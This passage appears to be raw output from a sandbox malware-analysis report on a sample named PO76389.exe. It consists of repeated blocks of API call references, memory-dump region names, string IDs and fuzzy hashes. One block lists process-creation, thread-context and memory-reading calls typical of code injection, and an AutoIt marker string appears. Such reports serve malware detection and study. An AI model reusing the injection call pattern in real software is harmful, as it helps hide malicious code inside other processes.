                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleTime
                                                    • String ID:
                                                    • API String ID: 3397143404-0
                                                    • Opcode ID: 9c54163f4ba2f33320bd74852155a8510d3a834e28009832c07b67a490f6f9f5
                                                    • Instruction ID: c98b6e6a0ea11fa9eee6d70d3375eadaf9eabe00888bc9bdc1535ce2bfabe961
                                                    • Opcode Fuzzy Hash: 9c54163f4ba2f33320bd74852155a8510d3a834e28009832c07b67a490f6f9f5
                                                    • Instruction Fuzzy Hash: 87E08632140218BBD7311B54BC09FCA7B39AB15774F104210FB15691E087B16515E7A8
                                                    APIs
                                                    • _free.LIBCMT ref: 004FC45E
                                                      • Part of subcall function 004D28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,004D8715,00000000,004D88A3,004D4673,?), ref: 004D28DE
                                                      • Part of subcall function 004D28CA: GetLastError.KERNEL32(00000000,?,004D8715,00000000,004D88A3,004D4673,?), ref: 004D28F0
                                                    • _free.LIBCMT ref: 004FC46F
                                                    • _free.LIBCMT ref: 004FC481
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                                    • Instruction ID: f022a94627a0574eabaaa930a509d208650d51a10b4d1ef6fb59618d6dde1429
                                                    • Opcode Fuzzy Hash: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                                    • Instruction Fuzzy Hash: 84E0C2A160070482CA20B97A6AA0BB353CC2F04310B04096FF549D3382CF5CE840A03C
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: EA06
                                                    • API String ID: 4104443479-3962188686
                                                    • Opcode ID: 5e9adad7c6e9f90e06c1c85b1d727b1d714ad421438514e47ea7af884c08d50a
                                                    • Instruction ID: 9b6afbe66828c7d41ce9c01d634270eae67b314b1cb82fb27023465c481a9f98
                                                    • Opcode Fuzzy Hash: 5e9adad7c6e9f90e06c1c85b1d727b1d714ad421438514e47ea7af884c08d50a
                                                    • Instruction Fuzzy Hash: 23419E21E0411497DB11AB6888957FF7F62DFD5304F18456BEA82DB283C6398DC187BA
                                                    APIs
                                                    • _memset.LIBCMT ref: 00523CF1
                                                      • Part of subcall function 004B31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 004B31DA
                                                      • Part of subcall function 004B3A67: SHGetMalloc.SHELL32(1<K), ref: 004B3A7D
                                                      • Part of subcall function 004B3A67: SHGetDesktopFolder.SHELL32(?), ref: 004B3A8F
                                                      • Part of subcall function 004B3A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 004B3AD2
                                                      • Part of subcall function 004B3B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,005722E8,?), ref: 004B3B65
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                                                    • String ID: X
                                                    • API String ID: 2727075218-3081909835
                                                    • Opcode ID: f6fe26d8122585bca33a0af75ab43a3cba4b65b7b512334389c4105e0e4824f7
                                                    • Instruction ID: c4b907415022ace992e445d317f9ec2da2c21512a22b7f9c0c5729a8a6e2568a
                                                    • Opcode Fuzzy Hash: f6fe26d8122585bca33a0af75ab43a3cba4b65b7b512334389c4105e0e4824f7
                                                    • Instruction Fuzzy Hash: C211A7B1A00298ABCF05DFDAD8056DEBFF9AF45705F00400EE501BB341DBB85A49CBA5
                                                    Strings
                                                    • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 005234AA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                    • API String ID: 1029625771-2684727018
                                                    • Opcode ID: 1220bf9858a43fcfa6012623acd6a56c1a2c86272381da9a610af85366fd6cea
                                                    • Instruction ID: c8a99aaa030bf87cb2cdeed0fa13ac3d7e6bcf0d2416237564fcb90232405ac9
                                                    • Opcode Fuzzy Hash: 1220bf9858a43fcfa6012623acd6a56c1a2c86272381da9a610af85366fd6cea
                                                    • Instruction Fuzzy Hash: 8FF0447190021DAA9F11FEA2D9918FFB778BE10308B10856BE81592181EB38DB09DB75
                                                    APIs
                                                    • _memmove.LIBCMT ref: 004D367B
                                                    • __flush.LIBCMT ref: 004D369B
                                                      • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __flush__getptd_noexit_memmove
                                                    • String ID:
                                                    • API String ID: 3662107617-0
                                                    • Opcode ID: 9e5238af4f93087f8e5510cddb81ebd4f4ffd6b6554c3a66413832ef0355d351
                                                    • Instruction ID: c6942b6da0637bc732aa771e00b544dddbf2780d7b69c15d969ffb51003e8e7f
                                                    • Opcode Fuzzy Hash: 9e5238af4f93087f8e5510cddb81ebd4f4ffd6b6554c3a66413832ef0355d351
                                                    • Instruction Fuzzy Hash: 7041C4B5700606ABDF288F69C8A056F7BA5AB40362B24853FE815C7340DB78DF418B5A
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 133b38695466df121deeaeea8cbe640b9a56e9704eac05184d143640a7114888
                                                    • Instruction ID: 0fc4d9e5c3012e6700b9588fee829778524fb1b6cf0e0c2e20502afc3205cbc4
                                                    • Opcode Fuzzy Hash: 133b38695466df121deeaeea8cbe640b9a56e9704eac05184d143640a7114888
                                                    • Instruction Fuzzy Hash: 103191B1600906AFC714DF29C8D1EA9F7A8FF48320754822EE519CB391DB74E825CBE4
                                                    APIs
                                                    • 745AC8D0.UXTHEME ref: 004B36E6
                                                      • Part of subcall function 004D2025: __lock.LIBCMT ref: 004D202B
                                                      • Part of subcall function 004B32DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 004B32F6
                                                      • Part of subcall function 004B32DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 004B330B
                                                      • Part of subcall function 004B374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 004B376D
                                                      • Part of subcall function 004B374E: IsDebuggerPresent.KERNEL32(?,?), ref: 004B377F
                                                      • Part of subcall function 004B374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\PO76389.exe,00000104,?,00571120,C:\Users\user\Desktop\PO76389.exe,00571124,?,?), ref: 004B37EE
                                                      • Part of subcall function 004B374E: SetCurrentDirectoryW.KERNEL32(?), ref: 004B3860
                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 004B3726
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                                    • String ID:
                                                    • API String ID: 3809921791-0
                                                    • Opcode ID: fcda04c079f8b4285d8efac0f954ccfddcac6298f8889671075fa00c9ed206b0
                                                    • Instruction ID: 094cdf020daba62ab795a9436f7a8f4448547bf3e8ca8dd01a1a2c502bec4b76
                                                    • Opcode Fuzzy Hash: fcda04c079f8b4285d8efac0f954ccfddcac6298f8889671075fa00c9ed206b0
                                                    • Instruction Fuzzy Hash: F01193719143419FC310DF2AED4991ABBF8FFA4714F00491FF448872A1DBB49588EB9A
                                                    APIs
                                                    • ___lock_fhandle.LIBCMT ref: 004DF7D9
                                                    • __close_nolock.LIBCMT ref: 004DF7F2
                                                      • Part of subcall function 004D886A: __getptd_noexit.LIBCMT ref: 004D886A
                                                      • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                    • String ID:
                                                    • API String ID: 1046115767-0
                                                    • Opcode ID: 5cd6457b4c6c2f7d948903466a6a16263e6637314eac679a408c893d1d56d30d
                                                    • Instruction ID: 1ab5f701e85ddb78587e8c9069bb1b38cfc47135809ac95b5d2146f1105c31f0
                                                    • Opcode Fuzzy Hash: 5cd6457b4c6c2f7d948903466a6a16263e6637314eac679a408c893d1d56d30d
                                                    • Instruction Fuzzy Hash: E71102328056108EC7217FA598623593A906F42338F56026BF4265F3E3CBBC5944A6AE
                                                    APIs
                                                      • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                    • __lock_file.LIBCMT ref: 004D42B9
                                                      • Part of subcall function 004D5A9F: __lock.LIBCMT ref: 004D5AC2
                                                    • __fclose_nolock.LIBCMT ref: 004D42C4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                    • String ID:
                                                    • API String ID: 2800547568-0
                                                    • Opcode ID: b7f2c17ae74e56034f8504186c91a8b410ae9351451676d3354b03655629e646
                                                    • Instruction ID: 553b7fe928dea43ed6394665b8335ad91dc171379bae0c730a3aaa8710df2590
                                                    • Opcode Fuzzy Hash: b7f2c17ae74e56034f8504186c91a8b410ae9351451676d3354b03655629e646
                                                    • Instruction Fuzzy Hash: B2F090319017149BD710BB76881276E7BD06F81378F61828FB864AB3C2DB7C9A019F5D
                                                    APIs
                                                    • CreateProcessW.KERNEL32(?,00000000), ref: 00DA0DF3
                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00DA0E89
                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00DA0EAB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096915839.0000000000D9F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D9F000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d9f000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                    • String ID:
                                                    • API String ID: 2438371351-0
                                                    • Opcode ID: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                                                    • Instruction ID: 968d17df095d8fb4497d0a92f07993732694459af90cb0e80e4f2dd0cb55cf0c
                                                    • Opcode Fuzzy Hash: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                                                    • Instruction Fuzzy Hash: 3812DD24E24658C6EB24DF64D8507DEB232FF69300F1090E9910DEB7A5E77A4F81CB5A
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: e85b4e5e48b803414d1e965ad60749aaaa9c08348be1f3036355104e4980f3b1
                                                    • Instruction ID: 82e249513ac556629f0b54563a2bb84b11585aa1895b18e85135c8972501b033
                                                    • Opcode Fuzzy Hash: e85b4e5e48b803414d1e965ad60749aaaa9c08348be1f3036355104e4980f3b1
                                                    • Instruction Fuzzy Hash: DA41BFB9200602DFC314DF1AD491AA2F7E0FF89360714C42FE89A87751DB75E852CBA9
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction ID: e8b62a8b4f143a42b037b255cb791e4ee5063f76b68ff27bfc9c3d02dcea84ff
                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction Fuzzy Hash: 2631EEB4A00105ABCB98DF58D480F6AF7A6FF49300B2482AAE449CB355D739EDC5CBC5
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 1e850adbdb7c9e6fe0a34f0b9ec4e119c55207dd0840db4dc6905a34e7020270
                                                    • Instruction ID: 5260fd36515e208dd6a335c690294db6e176c6a339a3c4d8fa11efe0b70efcd4
                                                    • Opcode Fuzzy Hash: 1e850adbdb7c9e6fe0a34f0b9ec4e119c55207dd0840db4dc6905a34e7020270
                                                    • Instruction Fuzzy Hash: 63210271600A19FBCB144F25EC46BA9BFB8FF65340F21842EE486C50A0EBB484D4E759
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: a00d7a5051e9298dd2b7e71de643703e5e9f14732e3261764243371c89c6d2d4
                                                    • Instruction ID: 25c8b0003845f62de0967a0c68061fe17b40fb1de8c9e3dc9854c93a37b32c9d
                                                    • Opcode Fuzzy Hash: a00d7a5051e9298dd2b7e71de643703e5e9f14732e3261764243371c89c6d2d4
                                                    • Instruction Fuzzy Hash: 17117C75600601DFC724DF29D481A56B7E9FF48314B20846FE89ACB361E736E841CF54
                                                    APIs
                                                      • Part of subcall function 004B3F5D: FreeLibrary.KERNEL32(00000000,?), ref: 004B3F90
                                                      • Part of subcall function 004D4129: __wfsopen.LIBCMT ref: 004D4134
                                                    • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004B34E2,?,00000001), ref: 004B3FCD
                                                      • Part of subcall function 004B3E78: FreeLibrary.KERNEL32(00000000), ref: 004B3EAB
                                                      • Part of subcall function 004B4010: _memmove.LIBCMT ref: 004B405A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                    • String ID:
                                                    • API String ID: 1396898556-0
                                                    • Opcode ID: 7503dd8349d0e97b230f443c6450d814354dbeee7db08639ccb7f04af7c5f660
                                                    • Instruction ID: 32920acd9ad6f6db22ff66bd175ef7eecc30d2eb0eee4f70ff913828e6cbcde3
                                                    • Opcode Fuzzy Hash: 7503dd8349d0e97b230f443c6450d814354dbeee7db08639ccb7f04af7c5f660
                                                    • Instruction Fuzzy Hash: 19112731600209BACB11BF76DC17BDE76A49F90709F10442FF541E61C2DB78DA059778
                                                    APIs
                                                    • ___lock_fhandle.LIBCMT ref: 004DBD73
                                                      • Part of subcall function 004D886A: __getptd_noexit.LIBCMT ref: 004D886A
                                                      • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
